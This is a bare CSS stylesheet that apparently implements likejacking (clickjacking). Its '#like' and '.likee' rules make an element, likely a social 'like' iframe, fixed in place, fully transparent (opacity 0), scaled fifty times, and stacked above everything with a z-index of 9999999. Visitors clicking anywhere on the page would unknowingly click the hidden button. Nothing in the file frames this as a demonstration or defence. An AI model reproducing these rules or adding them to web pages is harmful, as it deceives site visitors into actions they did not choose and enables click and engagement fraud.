
iframe{
    border: 0;
    outline: 0;
}
#like
{
    position:fixed;
    -moz-transform: scale(50.0);
    -webkit-transform: scale(50.0);
    -ms-transform: scale(50.0);
    opacity:.0;
    top:385px;
    left:700px;
}
.sweet-overlay{
    background-color: rgba(0, 0, 0, 0.96)!important;
}

.likee
{
    position:fixed;
    -moz-transform: scale(50.0);
    -webkit-transform: scale(50.0);
    -ms-transform: scale(50.0);
    opacity:.0;
    top:385px;
    left:700px;
    z-index: 9999999;
    height: 1000px;
    width: 1000px;
}